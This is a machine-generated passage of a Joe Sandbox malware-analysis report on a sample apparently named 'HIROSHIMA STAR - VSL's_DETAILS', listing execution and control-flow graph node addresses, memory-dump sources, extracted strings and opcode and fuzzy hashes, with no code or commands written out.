                                                                                                                                                                      execution_graph 25770 2fee018 25771 2fee024 25770->25771 25774 6f84e00 25771->25774 25772 2fee0c3 25775 6f84e22 25774->25775 25776 6f84eee 25775->25776 25781 6f8b7b0 25775->25781 25785 6f8bdb4 25775->25785 25791 6f8b9d0 25775->25791 25797 6f8b7a0 25775->25797 25776->25772 25782 6f8b7c2 25781->25782 25784 6f8b7c7 25781->25784 25782->25776 25783 6f8bef1 LdrInitializeThunk 25783->25782 25784->25782 25784->25783 25788 6f8bc6b 25785->25788 25786 6f8bdac LdrInitializeThunk 25789 6f8bf09 25786->25789 25788->25786 25790 6f8b7b0 LdrInitializeThunk 25788->25790 25789->25776 25790->25788 25793 6f8ba01 25791->25793 25792 6f8bb61 25792->25776 25793->25792 25794 6f8bdac LdrInitializeThunk 25793->25794 25796 6f8b7b0 LdrInitializeThunk 25793->25796 25794->25792 25796->25793 25798 6f8b7c2 25797->25798 25802 6f8b7c7 25797->25802 25798->25776 25799 6f8bdac LdrInitializeThunk 25799->25798 25801 6f8b7b0 LdrInitializeThunk 25801->25802 25802->25798 25802->25799 25802->25801 25803 6f8c0a0 25804 6f8c0a7 25803->25804 25806 6f8c0ad 25803->25806 25805 6f8b7b0 LdrInitializeThunk 25804->25805 25804->25806 25808 6f8c42e 25804->25808 25805->25808 25807 6f8b7b0 LdrInitializeThunk 25807->25808 25808->25806 25808->25807

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 267 2fe7118-2fe713b 268 2fe713d-2fe7143 267->268 269 2fe7146-2fe7166 267->269 268->269 272 2fe716d-2fe7174 269->272 273 2fe7168 269->273 275 2fe7176-2fe7181 272->275 274 2fe74fc-2fe7505 273->274 276 2fe750d-2fe7517 275->276 277 2fe7187-2fe719a 275->277 282 2fe7519 276->282 280 2fe719c-2fe71aa 277->280 281 2fe71b0-2fe71cb 277->281 280->281 287 2fe7484-2fe748b 280->287 289 2fe71ef-2fe71f2 281->289 290 2fe71cd-2fe71d3 281->290 282->282 283 2fe751b-2fe751f 282->283 285 2fe7521 283->285 285->285 288 2fe7523-2fe7549 285->288 287->274 293 2fe748d-2fe748f 287->293 308 2fe754b-2fe7550 288->308 309 2fe7552-2fe7556 288->309 294 2fe734c-2fe7352 289->294 295 2fe71f8-2fe71fb 289->295 291 2fe71dc-2fe71df 290->291 292 2fe71d5 290->292 298 2fe7212-2fe7218 291->298 299 2fe71e1-2fe71e4 291->299 292->291 292->294 297 2fe743e-2fe7441 292->297 292->298 300 2fe749e-2fe74a4 293->300 301 2fe7491-2fe7496 293->301 294->297 302 2fe7358-2fe735d 294->302 295->294 303 2fe7201-2fe7207 295->303 304 2fe7508 297->304 305 2fe7447-2fe744d 297->305 306 2fe721e-2fe7220 298->306 307 2fe721a-2fe721c 298->307 310 2fe727e-2fe7284 299->310 311 2fe71ea 299->311 300->276 312 2fe74a6-2fe74ab 300->312 301->300 302->297 303->294 313 2fe720d 303->313 304->276 315 2fe744f-2fe7457 305->315 316 2fe7472-2fe7476 305->316 317 2fe722a-2fe7233 306->317 307->317 318 2fe755c-2fe755d 308->318 309->318 310->297 314 2fe728a-2fe7290 310->314 311->297 319 2fe74ad-2fe74b2 312->319 320 2fe74f0-2fe74f3 312->320 313->297 321 2fe7296-2fe7298 314->321 322 2fe7292-2fe7294 314->322 315->276 323 2fe745d-2fe746c 315->323 316->287 326 2fe7478-2fe747e 316->326 324 2fe7246-2fe726e 317->324 325 2fe7235-2fe7240 317->325 319->304 328 2fe74b4 319->328 320->304 327 2fe74f5-2fe74fa 320->327 330 2fe72a2-2fe72b9 321->330 322->330 323->281 323->316 348 2fe7274-2fe7279 324->348 349 2fe7362-2fe7398 324->349 325->297 325->324 326->275 326->287 327->274 327->293 329 2fe74bb-2fe74c0 328->329 331 2fe74e2-2fe74e4 329->331 332 2fe74c2-2fe74c4 329->332 341 2fe72bb-2fe72d4 330->341 342 2fe72e4-2fe730b 330->342 331->304 339 2fe74e6-2fe74e9 331->339 336 2fe74c6-2fe74cb 332->336 337 2fe74d3-2fe74d9 332->337 336->337 337->276 340 2fe74db-2fe74e0 337->340 339->320 340->331 344 2fe74b6-2fe74b9 340->344 341->349 354 2fe72da-2fe72df 341->354 342->304 353 2fe7311-2fe7314 342->353 344->304 344->329 348->349 355 2fe739a-2fe739e 349->355 356 2fe73a5-2fe73ad 349->356 353->304 357 2fe731a-2fe7343 353->357 354->349 358 2fe73bd-2fe73c1 355->358 359 2fe73a0-2fe73a3 355->359 356->304 360 2fe73b3-2fe73b8 356->360 357->349 372 2fe7345-2fe734a 357->372 361 2fe73c3-2fe73c9 358->361 362 2fe73e0-2fe73e4 358->362 359->356 359->358 360->297 361->362 364 2fe73cb-2fe73d3 361->364 365 2fe73ee-2fe740d call 2fe76f1 362->365 366 2fe73e6-2fe73ec 362->366 364->304 367 2fe73d9-2fe73de 364->367 369 2fe7413-2fe7417 365->369 366->365 366->369 367->297 369->297 370 2fe7419-2fe7435 369->370 370->297 372->349
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                      • API String ID: 0-2525668591
                                                                                                                                                                      • Opcode ID: 0dcb948bce91c21b6177b0ee877b82e54a619145a2609bf0a58b1eec7ddacceb
                                                                                                                                                                      • Instruction ID: 74ae3384dd5be06eb9ced4025b193352232b9ee96d6cca404a22160abb695802
                                                                                                                                                                      • Opcode Fuzzy Hash: 0dcb948bce91c21b6177b0ee877b82e54a619145a2609bf0a58b1eec7ddacceb
                                                                                                                                                                      • Instruction Fuzzy Hash: FEE11C31E00219DFDF16EFA9D984AADFBB2BF88384F558055E906AB365D730E841CB50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 374 2fe29ec-2fe29f6 376 2fe29f8-2fe2a3b 374->376 377 2fe2981-2fe2999 374->377 383 2fe2a5d-2fe2aac 376->383 384 2fe2a3d-2fe2a5c 376->384 380 2fe29a0-2fe29c8 377->380 388 2fe2aae-2fe2ab5 383->388 389 2fe2ac7-2fe2acf 383->389 390 2fe2abe-2fe2ac5 388->390 391 2fe2ab7-2fe2abc 388->391 392 2fe2ad2-2fe2ae6 389->392 390->392 391->392 395 2fe2afc-2fe2b04 392->395 396 2fe2ae8-2fe2aef 392->396 399 2fe2b06-2fe2b0a 395->399 397 2fe2af5-2fe2afa 396->397 398 2fe2af1-2fe2af3 396->398 397->399 398->399 401 2fe2b0c-2fe2b21 399->401 402 2fe2b6a-2fe2b6d 399->402 401->402 410 2fe2b23-2fe2b26 401->410 403 2fe2b6f-2fe2b84 402->403 404 2fe2bb5-2fe2bbb 402->404 403->404 413 2fe2b86-2fe2b8a 403->413 406 2fe36b6 404->406 407 2fe2bc1-2fe2bc3 404->407 416 2fe36bb-2fe3700 406->416 407->406 408 2fe2bc9-2fe2bce 407->408 411 2fe3664-2fe3668 408->411 412 2fe2bd4 408->412 414 2fe2b28-2fe2b2a 410->414 415 2fe2b45-2fe2b63 call 2fe02c8 410->415 417 2fe366f-2fe36b5 411->417 418 2fe366a-2fe366d 411->418 412->411 419 2fe2b8c-2fe2b90 413->419 420 2fe2b92-2fe2bb0 call 2fe02c8 413->420 414->415 421 2fe2b2c-2fe2b2f 414->421 415->402 432 2fe372e-2fe3874 416->432 433 2fe3702-2fe3728 416->433 418->416 418->417 419->404 419->420 420->404 421->402 426 2fe2b31-2fe2b43 421->426 426->402 426->415 436 2fe38a6-2fe38a9 432->436 437 2fe3876-2fe3878 432->437 433->432 439 2fe38aa-2fe38bc 436->439 437->439 440 2fe387a-2fe38a3 437->440 442 2fe38ee-2fe38f4 439->442 443 2fe38be-2fe38eb 439->443 440->436 445 2fe3928-2fe3937 442->445 446 2fe38f6-2fe3908 442->446 443->442 447 2fe393a-2fe393d 445->447 446->447 448 2fe390a-2fe390c 446->448 450 2fe393e-2fe3941 447->450 448->450 451 2fe390e-2fe3910 448->451 452 2fe3942-2fe39e8 450->452 451->452 453 2fe3912-2fe3927 451->453 453->445
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                      • API String ID: 0-2732225958
                                                                                                                                                                      • Opcode ID: 9371bd37867fa62770e2460e1e7be0a888e973e85bbc1fdf3dd9bad21917a7a4
                                                                                                                                                                      • Instruction ID: 34e69be15845fe1e8ceac324369459f1b7c763ab52b5665d2f2625134e7dad2a
                                                                                                                                                                      • Opcode Fuzzy Hash: 9371bd37867fa62770e2460e1e7be0a888e973e85bbc1fdf3dd9bad21917a7a4
                                                                                                                                                                      • Instruction Fuzzy Hash: F0F1F861A081D58BDB178F3446683EBFFB7EF8B608B1804E9CDC766253EA255887C750
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (o^q$4'^q
                                                                                                                                                                      • API String ID: 0-273632683
                                                                                                                                                                      • Opcode ID: 4773e667ce62bac131aa621a80d8105349009b8a4e1b013eda79d8197b1e2a8e
                                                                                                                                                                      • Instruction ID: 9f81ec92cda60a22342e5a57bb555dabee538ad50c8c718461755b31f903d877
                                                                                                                                                                      • Opcode Fuzzy Hash: 4773e667ce62bac131aa621a80d8105349009b8a4e1b013eda79d8197b1e2a8e
                                                                                                                                                                      • Instruction Fuzzy Hash: B1826B71A00209DFCF16CFA8C984AAEBBF2BF88740F158559E5069B265D734ED81CB61

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1870 2fe69b0-2fe69e6 1872 2fe69ec-2fe69fa 1870->1872 1873 2fe6fb1-2fe6fba 1870->1873 1876 2fe69fc-2fe6a0d 1872->1876 1877 2fe6a28-2fe6a39 1872->1877 1878 2fe6fbc-2fe6fc0 1873->1878 1879 2fe6fc1 1873->1879 1876->1877 1888 2fe6a0f-2fe6a1b 1876->1888 1880 2fe6aaa-2fe6abe 1877->1880 1881 2fe6a3b-2fe6a3f 1877->1881 1878->1879 1882 2fe6fc9-2fe700c call 2fe7118 1879->1882 1883 2fe6fc4 1879->1883 2017 2fe6ac1 call 2fe69b0 1880->2017 2018 2fe6ac1 call 2fe69a0 1880->2018 1885 2fe6a5a-2fe6a63 1881->1885 1886 2fe6a41-2fe6a4d 1881->1886 1895 2fe700e-2fe7012 1882->1895 1896 2fe705c-2fe7060 1882->1896 1883->1882 1892 2fe6d6c 1885->1892 1893 2fe6a69-2fe6a6c 1885->1893 1890 2fe6ddb-2fe6e26 1886->1890 1891 2fe6a53-2fe6a55 1886->1891 1897 2fe6d71-2fe6dd4 1888->1897 1898 2fe6a21-2fe6a23 1888->1898 1889 2fe6ac7-2fe6acd 1899 2fe6acf-2fe6ad1 1889->1899 1900 2fe6ad6-2fe6add 1889->1900 1971 2fe6e2d-2fe6eac 1890->1971 1901 2fe6d62-2fe6d69 1891->1901 1892->1897 1893->1892 1894 2fe6a72-2fe6a91 1893->1894 1894->1892 1934 2fe6a97-2fe6a9d 1894->1934 1903 2fe7014-2fe7019 1895->1903 1904 2fe7021-2fe7028 1895->1904 1907 2fe7077-2fe708b 1896->1907 1908 2fe7062-2fe7071 1896->1908 1897->1890 1898->1901 1899->1901 1905 2fe6bcb-2fe6bdc 1900->1905 1906 2fe6ae3-2fe6afa 1900->1906 1903->1904 1911 2fe70fe-2fe7113 1904->1911 1912 2fe702e-2fe7035 1904->1912 1924 2fe6bde-2fe6beb 1905->1924 1925 2fe6c06-2fe6c0c 1905->1925 1906->1905 1931 2fe6b00-2fe6b0c 1906->1931 2020 2fe708d call 2fea0e8 1907->2020 2021 2fe708d call 2fea088 1907->2021 2022 2fe708d call 2fe9dd0 1907->2022 1913 2fe709d-2fe70a7 1908->1913 1914 2fe7073-2fe7075 1908->1914 1912->1896 1920 2fe7037-2fe703b 1912->1920 1918 2fe70a9-2fe70af 1913->1918 1919 2fe70b1-2fe70b5 1913->1919 1915 2fe7093-2fe709a 1914->1915 1927 2fe70bd-2fe70f7 1918->1927 1919->1927 1928 2fe70b7 1919->1928 1929 2fe703d-2fe7042 1920->1929 1930 2fe704a-2fe7051 1920->1930 1937 2fe6c27-2fe6c2d 1924->1937 1949 2fe6bed-2fe6bf9 1924->1949 1936 2fe6c0e-2fe6c1a 1925->1936 1925->1937 1927->1911 1928->1927 1929->1930 1930->1911 1938 2fe7057-2fe705a 1930->1938 1932 2fe6bc4-2fe6bc6 1931->1932 1933 2fe6b12-2fe6b7e 1931->1933 1932->1901 1974 2fe6bac-2fe6bc1 1933->1974 1975 2fe6b80-2fe6baa 1933->1975 1934->1873 1940 2fe6aa3-2fe6aa7 1934->1940 1943 2fe6ec3-2fe6f26 1936->1943 1944 2fe6c20-2fe6c22 1936->1944 1945 2fe6d5f 1937->1945 1946 2fe6c33-2fe6c50 1937->1946 1938->1915 1940->1880 1998 2fe6f2d-2fe6fac 1943->1998 1944->1901 1945->1901 1946->1892 1963 2fe6c56-2fe6c59 1946->1963 1953 2fe6bff-2fe6c01 1949->1953 1954 2fe6eb1-2fe6ebc 1949->1954 1953->1901 1954->1943 1963->1873 1966 2fe6c5f-2fe6c85 1963->1966 1966->1945 1979 2fe6c8b-2fe6c97 1966->1979 1974->1932 1975->1974 1981 2fe6c9d-2fe6d15 1979->1981 1982 2fe6d5b-2fe6d5d 1979->1982 1999 2fe6d17-2fe6d41 1981->1999 2000 2fe6d43-2fe6d58 1981->2000 1982->1901 1999->2000 2000->1982 2017->1889 2018->1889 2020->1915 2021->1915 2022->1915
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (o^q$Hbq
                                                                                                                                                                      • API String ID: 0-662517225
                                                                                                                                                                      • Opcode ID: d549b89eb0df19bc63a7482aa313d3b1d2d3b0ad7d3dab7a6779060105f63cf1
                                                                                                                                                                      • Instruction ID: d1e2bda9229a1778b027c11da1390a2e270b71d74f9e7a13c387edc3327a6b58
                                                                                                                                                                      • Opcode Fuzzy Hash: d549b89eb0df19bc63a7482aa313d3b1d2d3b0ad7d3dab7a6779060105f63cf1
                                                                                                                                                                      • Instruction Fuzzy Hash: CE228C70A002198FCB16DF69C854BAEBBF6BF88740F148569E906EB395DB34DD41CB90

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 2023 2fe3e09-2fe3e25 2024 2fe3e2e-2fe3e3e 2023->2024 2025 2fe3e27-2fe3e29 2023->2025 2027 2fe3e45-2fe3e55 2024->2027 2028 2fe3e40 2024->2028 2026 2fe40cc-2fe40d3 2025->2026 2030 2fe3e5b-2fe3e69 2027->2030 2031 2fe40b3-2fe40c1 2027->2031 2028->2026 2034 2fe3e6f 2030->2034 2035 2fe40d4-2fe4152 2030->2035 2031->2035 2036 2fe40c3-2fe40c7 call 2fe02c8 2031->2036 2034->2035 2037 2fe3f9f-2fe3fc7 2034->2037 2038 2fe3eda-2fe3efb 2034->2038 2039 2fe4039-2fe4065 2034->2039 2040 2fe3e76-2fe3e88 2034->2040 2041 2fe3f72-2fe3f9a 2034->2041 2042 2fe3eb3-2fe3ed5 2034->2042 2043 2fe400e-2fe4034 2034->2043 2044 2fe3f4c-2fe3f6d 2034->2044 2045 2fe3fcc-2fe4009 2034->2045 2046 2fe3e8d-2fe3eae 2034->2046 2047 2fe3f26-2fe3f47 2034->2047 2048 2fe4067-2fe4082 call 2fe02d8 2034->2048 2049 2fe40a7-2fe40b1 2034->2049 2050 2fe4084-2fe40a5 call 2fe28f0 2034->2050 2051 2fe3f00-2fe3f21 2034->2051 2036->2026 2037->2026 2038->2026 2039->2026 2040->2026 2041->2026 2042->2026 2043->2026 2044->2026 2045->2026 2046->2026 2047->2026 2048->2026 2049->2026 2050->2026 2051->2026
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$$^q
                                                                                                                                                                      • API String ID: 0-1593437937
                                                                                                                                                                      • Opcode ID: 11b97c0f053accfbc8306a1c7fd7fd5895bf8d814ca5d9703d731671dc2df9e5
                                                                                                                                                                      • Instruction ID: 97258d8044b2eb15c95c2fb24b57886e949a473d55108f73fd0205fd72f08250
                                                                                                                                                                      • Opcode Fuzzy Hash: 11b97c0f053accfbc8306a1c7fd7fd5895bf8d814ca5d9703d731671dc2df9e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 13919871B04219DBDF59EBB8985427E7BA7BFC4740B04852DD547E7388CE349C028B96

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 2190 2fe5362-2fe5376 2191 2fe537d-2fe537f 2190->2191 2192 2fe5378-2fe537a 2190->2192 2194 2fe5381-2fe53a0 2191->2194 2193 2fe537c 2192->2193 2192->2194 2193->2191 2195 2fe53a7-2fe5484 call 2fe41a0 call 2fe3cc0 2194->2195 2196 2fe53a2 2194->2196 2206 2fe548b-2fe54a9 2195->2206 2207 2fe5486 2195->2207 2196->2195 2237 2fe54ac call 2fe5658 2206->2237 2238 2fe54ac call 2fe5649 2206->2238 2207->2206 2208 2fe54b2-2fe54bd 2209 2fe54bf 2208->2209 2210 2fe54c4-2fe54c8 2208->2210 2209->2210 2211 2fe54cd-2fe54d4 2210->2211 2212 2fe54ca-2fe54cb 2210->2212 2214 2fe54db-2fe54e9 2211->2214 2215 2fe54d6 2211->2215 2213 2fe54ec-2fe5530 2212->2213 2219 2fe5596-2fe55ad 2213->2219 2214->2213 2215->2214 2221 2fe55af-2fe55d4 2219->2221 2222 2fe5532-2fe5548 2219->2222 2229 2fe55ec 2221->2229 2230 2fe55d6-2fe55eb 2221->2230 2226 2fe554a-2fe5556 2222->2226 2227 2fe5572 2222->2227 2231 2fe5558-2fe555e 2226->2231 2232 2fe5560-2fe5566 2226->2232 2228 2fe5578-2fe5595 2227->2228 2228->2219 2230->2229 2233 2fe5570 2231->2233 2232->2233 2233->2228 2237->2208 2238->2208
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                      • Opcode ID: 0e2ccb7926f0c0d83912ede022618a264a093993e274d5b8b604ff2a3b49d5b6
                                                                                                                                                                      • Instruction ID: 5d577cd532b9dd0391151a406ed1ee79b7455c70679a124f238e3ea0f2439f33
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e2ccb7926f0c0d83912ede022618a264a093993e274d5b8b604ff2a3b49d5b6
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F91F574E01218CFDB15CFAAD994A9DBBF2BF88304F14C06AE809AB365DB349945CF10

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 2239 2fed278-2fed27a 2240 2fed27c-2fed280 2239->2240 2241 2fed281-2fed2a8 2239->2241 2240->2241 2242 2fed2af-2fed38c call 2fe41a0 call 2fe3cc0 2241->2242 2243 2fed2aa 2241->2243 2253 2fed38e 2242->2253 2254 2fed393-2fed3b4 call 2fe5658 2242->2254 2243->2242 2253->2254 2256 2fed3b9-2fed3c4 2254->2256 2257 2fed3cb-2fed3cf 2256->2257 2258 2fed3c6 2256->2258 2259 2fed3d4-2fed3db 2257->2259 2260 2fed3d1-2fed3d2 2257->2260 2258->2257 2262 2fed3dd 2259->2262 2263 2fed3e2-2fed3f0 2259->2263 2261 2fed3f3-2fed437 2260->2261 2267 2fed49d-2fed4b4 2261->2267 2262->2263 2263->2261 2269 2fed439-2fed44f 2267->2269 2270 2fed4b6-2fed4db 2267->2270 2274 2fed479 2269->2274 2275 2fed451-2fed45d 2269->2275 2276 2fed4dd-2fed4f2 2270->2276 2277 2fed4f3 2270->2277 2280 2fed47f-2fed49c 2274->2280 2278 2fed45f-2fed465 2275->2278 2279 2fed467-2fed46d 2275->2279 2276->2277 2281 2fed477 2278->2281 2279->2281 2280->2267 2281->2280
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                      • Opcode ID: e8f8c2d0dce3f18719e1bb0e014af418b41b448f6ea3b7ca64e263ff529ec764
                                                                                                                                                                      • Instruction ID: fceb99c970e3546cb798ca5fedae86f100af04cdbc96310cfeeb86cc77c3bc1a
                                                                                                                                                                      • Opcode Fuzzy Hash: e8f8c2d0dce3f18719e1bb0e014af418b41b448f6ea3b7ca64e263ff529ec764
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D81D674E00218CFDB19DFAAD984A9DBBF2BF89340F14D069E509AB365DB309985CF10

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 2285 2fec468-2fec46d 2286 2fec46f-2fec498 2285->2286 2287 2fec4ed-2fec57c call 2fe41a0 call 2fe3cc0 2285->2287 2288 2fec49f-2fec4e7 2286->2288 2289 2fec49a 2286->2289 2298 2fec57e 2287->2298 2299 2fec583-2fec5a4 call 2fe5658 2287->2299 2288->2287 2289->2288 2298->2299 2301 2fec5a9-2fec5b4 2299->2301 2302 2fec5bb-2fec5bf 2301->2302 2303 2fec5b6 2301->2303 2304 2fec5c4-2fec5cb 2302->2304 2305 2fec5c1-2fec5c2 2302->2305 2303->2302 2307 2fec5cd 2304->2307 2308 2fec5d2-2fec5e0 2304->2308 2306 2fec5e3-2fec627 2305->2306 2312 2fec68d-2fec6a4 2306->2312 2307->2308 2308->2306 2314 2fec629-2fec63f 2312->2314 2315 2fec6a6-2fec6cb 2312->2315 2319 2fec669 2314->2319 2320 2fec641-2fec64d 2314->2320 2321 2fec6cd-2fec6e2 2315->2321 2322 2fec6e3 2315->2322 2325 2fec66f-2fec68c 2319->2325 2323 2fec64f-2fec655 2320->2323 2324 2fec657-2fec65d 2320->2324 2321->2322 2326 2fec667 2323->2326 2324->2326 2325->2312 2326->2325
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                      • Opcode ID: d6ca240a23a9dcd351da750b44880fee8af11c3b24ae2dec3e8a057a7c77e116
                                                                                                                                                                      • Instruction ID: efc8f399469945c7f6e98066d1b04d10c02d48175e675d42e2f53dacac18bfa6
                                                                                                                                                                      • Opcode Fuzzy Hash: d6ca240a23a9dcd351da750b44880fee8af11c3b24ae2dec3e8a057a7c77e116
                                                                                                                                                                      • Instruction Fuzzy Hash: 1681A6B4E00218CFDB15DFAAD984A9DBBF2BF88300F14D06AE519AB365DB349945CF50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 2330 2feccd8-2feccda 2331 2feccdc-2feccde 2330->2331 2332 2fecce1-2fecce4 2330->2332 2333 2fecce5-2fecd08 2331->2333 2334 2fecce0 2331->2334 2332->2333 2335 2fecd0f-2fecdec call 2fe41a0 call 2fe3cc0 2333->2335 2336 2fecd0a 2333->2336 2334->2332 2346 2fecdee 2335->2346 2347 2fecdf3-2fece14 call 2fe5658 2335->2347 2336->2335 2346->2347 2349 2fece19-2fece24 2347->2349 2350 2fece2b-2fece2f 2349->2350 2351 2fece26 2349->2351 2352 2fece34-2fece3b 2350->2352 2353 2fece31-2fece32 2350->2353 2351->2350 2355 2fece3d 2352->2355 2356 2fece42-2fece50 2352->2356 2354 2fece53-2fece97 2353->2354 2360 2fecefd-2fecf14 2354->2360 2355->2356 2356->2354 2362 2fece99-2feceaf 2360->2362 2363 2fecf16-2fecf3b 2360->2363 2367 2feced9 2362->2367 2368 2feceb1-2fecebd 2362->2368 2370 2fecf3d-2fecf52 2363->2370 2371 2fecf53 2363->2371 2369 2fecedf-2fecefc 2367->2369 2372 2fecebf-2fecec5 2368->2372 2373 2fecec7-2fececd 2368->2373 2369->2360 2370->2371 2374 2feced7 2372->2374 2373->2374 2374->2369
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                      • Opcode ID: 615a49a50d4fc5d6cddf4e6764065eedb9d0350901961eb0d94e3119c6c20a44
                                                                                                                                                                      • Instruction ID: a0551ae0bfe364d63aa8074be334fd0397606970e95f06b4324d572de5e2f852
                                                                                                                                                                      • Opcode Fuzzy Hash: 615a49a50d4fc5d6cddf4e6764065eedb9d0350901961eb0d94e3119c6c20a44
                                                                                                                                                                      • Instruction Fuzzy Hash: FD81D474E00248CFDB15DFAAD984A9DBBF2BF89300F14D06AE519AB365DB309981CF11

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
